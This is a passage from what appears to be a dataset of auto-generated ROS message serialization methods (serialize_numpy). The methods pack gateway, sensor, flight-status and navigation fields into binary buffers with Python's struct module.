str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.pending)\n buff.write(_struct_I.pack(length))\n for val1 in self.pending:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v33 = val1.platform_info\n _x = _v33.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v33.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v33.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v34 = _v33.icon\n _x = _v34.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v34.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v34.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v33.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v35 = val1.conn_stats\n _x = _v35\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v36 = val2.icon\n _x = _v36.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v36.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v36.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.available)\n buff.write(_struct_I.pack(length))\n for val1 in self.available:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v37 = val1.platform_info\n _x = _v37.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v37.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v37.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v38 = _v37.icon\n _x = _v38.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v38.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v38.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v37.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v39 = val1.conn_stats\n _x = _v39\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v40 = val2.icon\n _x = _v40.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v40.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v40.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.missing)\n buff.write(_struct_I.pack(length))\n for val1 in self.missing:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v41 = val1.platform_info\n _x = _v41.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v41.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v41.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v42 = _v41.icon\n _x = _v42.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v42.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v42.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v41.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v43 = val1.conn_stats\n _x = _v43\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v44 = val2.icon\n _x = _v44.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v44.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v44.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.gone)\n buff.write(_struct_I.pack(length))\n for val1 in self.gone:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v45 = val1.platform_info\n _x = _v45.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v45.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v45.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v46 = _v45.icon\n _x = _v46.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v46.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v46.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v45.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v47 = val1.conn_stats\n _x = _v47\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v48 = val2.icon\n _x = _v48.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v48.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v48.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_9B.pack(_x.dvl_sts, _x.svs_sts, _x.fog_sts, _x.nav_sts, _x.bat_sts, _x.t_sts, _x.h_sts, _x.p_sts, _x.water_sts))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.Header.seq, _x.Header.stamp.secs, _x.Header.stamp.nsecs))\n _x = self.Header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2hHBI().pack(_x.x_pos, _x.y_pos, _x.angle, _x.code_type, _x.code_num))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.Class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_d4q().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2B6f2Bb().pack(_x.status, _x.index, _x.range, _x.range_rate, _x.range_accl, _x.azimuth, _x.lateral_rate, _x.width, _x.is_mr_update, _x.is_lr_update, _x.amplitude))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_BQ().pack(_x.Front_sens.ID, _x.Front_sens.timestamp))\n buff.write(self.Front_sens.compass.tostring())\n buff.write(self.Front_sens.gyro.tostring())\n buff.write(self.Front_sens.accel.tostring())\n buff.write(self.Front_sens.fusionPose.tostring())\n buff.write(self.Front_sens.fusionQPose.tostring())\n _x = self\n buff.write(_get_struct_BQ().pack(_x.Rear_sens.ID, _x.Rear_sens.timestamp))\n buff.write(self.Rear_sens.compass.tostring())\n buff.write(self.Rear_sens.gyro.tostring())\n buff.write(self.Rear_sens.accel.tostring())\n buff.write(self.Rear_sens.fusionPose.tostring())\n buff.write(self.Rear_sens.fusionQPose.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(self.battery_voltage))\n _x = self.flight_mode_ll\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.state_estimation\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.position_control\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2B2f.pack(_x.serial_interface_enabled, _x.serial_interface_active, _x.flight_time, _x.cpu_load))\n _x = self.motor_status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.gps_status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_iBf.pack(_x.gps_num_satellites, _x.have_SSDK_parameters, _x.timesync_offset))\n buff.write(self.rc_channel.tostring())\n buff.write(self.control_axes.tostring())\n length = len(self.control_buttons)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.control_buttons.tostring())\n _x = self\n buff.write(_struct_6d.pack(_x.latitude, _x.longitude, _x.altitude, _x.pressure_height, _x.velocity_x, _x.velocity_y))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3B4IH3B.pack(_x.sysid, _x.compid, _x.limits_state, _x.last_trigger, _x.last_action, _x.last_recovery, _x.last_clear, _x.breach_count, _x.mods_enabled, _x.mods_required, _x.mods_triggered))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_d2H9d5fdI().pack(_x.Time, _x.Week, _x.Status, _x.RPY.x, _x.RPY.y, _x.RPY.z, _x.LLA.x, _x.LLA.y, _x.LLA.z, _x.NedVel.x, _x.NedVel.y, _x.NedVel.z, _x.YawUncertainty, _x.PitchUncertainty, _x.RollUncertainty, _x.PosUncertainty, _x.VelUncertainty, _x.SyncInTime, _x.SyncInCount))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_4i.pack(_x.FL_vel, _x.FR_vel, _x.BL_vel, _x.BR_vel))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, 